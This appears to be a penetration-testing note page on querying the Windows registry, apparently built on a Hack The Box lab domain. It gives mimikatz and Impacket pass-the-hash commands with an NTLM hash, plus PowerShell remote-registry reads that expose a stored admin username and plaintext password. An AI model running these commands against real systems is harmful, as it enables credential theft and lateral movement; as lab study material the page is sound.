Registry | Notion

Querying the registry

Locally

PowerShell #1

Get-ItemProperty -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa" lmcompatibilitylevel

PowerShell #2

We can run it locally or use mimikatz (sekurlsa::pth /user:henry.vinson /domain:htb.local /dc:htb.local /ntlm:e53d87d42adaa3ca32bdb34a876cbffb /command:powershell) to issue a command prompt for remote host

PS > $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', 'htb.local')
PS > $key = $reg.OpenSubKey('SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run')
PS > $reg.OpenSubKey('SOFTWARE').getSubkeyNames()
GiganticHostingManagementSystem
Microsoft
Policies
RegisteredApplications
VMware, Inc.
Wow6432Node
Classes
PS > $reg.OpenSubKey('SOFTWARE\\GiganticHostingManagementSystem').getValueNames()
UserName
PassWord
PS > $reg.OpenSubKey('SOFTWARE\\GiganticHostingManagementSystem').GetValue('UserName')
henry.vinson_adm
PS > $reg.OpenSubKey('SOFTWARE\\GiganticHostingManagementSystem').GetValue('Password')
G1#Ny5@2dvht

cmd

reg query HKLM\\Software\\Microsoft\\ResKit /v Version

Remotely

Impacket’s reg.py

Note that reg.py the Current User hive is referred to as HKU and not HKCU

oxdf@parrot$ reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/[email protected] query -keyName HKU\\\\SOFTWARE
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\\SOFTWARE
HKU\\SOFTWARE\\GiganticHostingManagementSystem
HKU\\SOFTWARE\\Microsoft
HKU\\SOFTWARE\\Policies
HKU\\SOFTWARE\\RegisteredApplications
HKU\\SOFTWARE\\VMware, Inc.
HKU\\SOFTWARE\\Wow6432Node
HKU\\SOFTWARE\\Classes

oxdf@parrot$ reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/[email protected] query -keyName HKU\\\\SOFTWARE\\\\GiganticHostingManagementSystem
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\\SOFTWARE\\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht

Cobalt strike

use the 'reg' command

reg query x64 HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion